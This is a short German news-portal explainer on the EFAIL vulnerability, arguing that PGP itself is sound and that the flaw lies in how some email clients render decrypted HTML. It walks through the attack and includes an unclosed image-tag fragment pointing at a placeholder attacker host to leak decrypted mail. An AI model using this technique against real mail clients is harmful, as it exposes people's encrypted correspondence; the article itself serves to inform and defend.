Font Size

Cpanel

PGP - embedded linux - news portal

  • Warum EFAIL nicht PGP selbst betrifft und wie es gegen PGP bzw. S/MIME funktioniert

    Auch wenn erste Nachrichtentitel teilweise anderes vermuten ließen, ist PGP selbst nicht von der Sicherheitslücke betroffen. Bei EFAIL handelt es sich vielmehr um eine fehlerhafte Umsetzung von PGP bzw. S/MIME einiger E-Mail-Programme.


    Zur Ausnutzung von EFAIL benötigt der Angreifer neben dem Wissen, dass das eingesetzte E-Mail-Programm die Sicherheitslücke EFAIL aufweist, auch Zugriff auf die verschlüsselten E-Mails. Der Angreifer versendet diese nun ein weiteres Mal, umgeben von zwei unverschlüsselten E-Mail-Blöcken. Der Erste beinhaltet z.B. einen unabgeschlossenen HTML-Image-Tag der Form <img src="http://angreifer.com/. Daraufhin folgt der originale, verschlüsselte E-Mail-Text gefolgt von einem weiteren unverschlüsselten HTML-Block, welcher den ersten HTML-Tag nun mit ">" abschließt.


    Von den betroffenen E-Mail-Clients wird zunächst automatisch der innere, verschlüsselte Block entschlüsselt und anschließend der HTML-Quelltext interpretiert. Dieser wird bei  korrekter Ausführung als Teil des HTML-Image-Tags interpretiert und (automatisch) geladen. Hierbei wird der entschlüsselte Text als Teil der Bildadresse interpretiert und versucht zu laden, womit der unverschlüsselte Text an den vorbereiteten Server des Angreifers übertragen wird.


    Eine umfangreiche und zugleich detaillierte Liste betroffener bzw. nicht betroffener E-Mail-Programme findet man unter auf thehackernews.com und eine genauere Erklärung zu EFAIL inzwischen auch bei Wikipedia.